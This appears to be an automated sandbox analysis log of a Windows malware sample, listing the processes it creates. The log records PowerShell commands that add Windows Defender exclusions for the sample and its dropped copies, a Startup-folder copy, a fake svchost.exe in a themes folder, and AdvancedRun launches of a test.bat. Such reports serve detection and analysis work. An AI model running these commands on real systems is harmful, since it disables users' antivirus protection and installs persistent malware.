Source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp | Binary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
Source: VknMvPoCXZ.exe | Virustotal: Detection: 47%
Source: VknMvPoCXZ.exe | ReversingLabs: Detection: 44%
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | File read: C:\Users\user\Desktop\VknMvPoCXZ.exe
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\VknMvPoCXZ.exe 'C:\Users\user\Desktop\VknMvPoCXZ.exe'
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Process created: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe | Process created: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe' /SpecialRun 4101d8 3336
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2244 -ip 2244
Source: unknown | Process created: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe'
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2244 -s 2328
Source: unknown | Process created: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe'
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2244 -ip 2244
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe | Process created: C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe | Process created: C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe | Process created: C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exe | Process created: C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exe' /SpecialRun 4101d8 6644
Source: C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exe | Process created: C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exe' /SpecialRun 4101d8 6512
Source: C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe | Process created: C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe' /SpecialRun 4101d8 6820
Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe | Process created: C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Windows\System32\svchost.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Process created: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe'
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2244 -s 2328
Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe | Process created: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe' /SpecialRun 4101d8 3336
Source: C:\Windows\System32\svchost.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe | Process created: C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe | Process created: C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2244 -ip 2244
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2244 -ip 2244
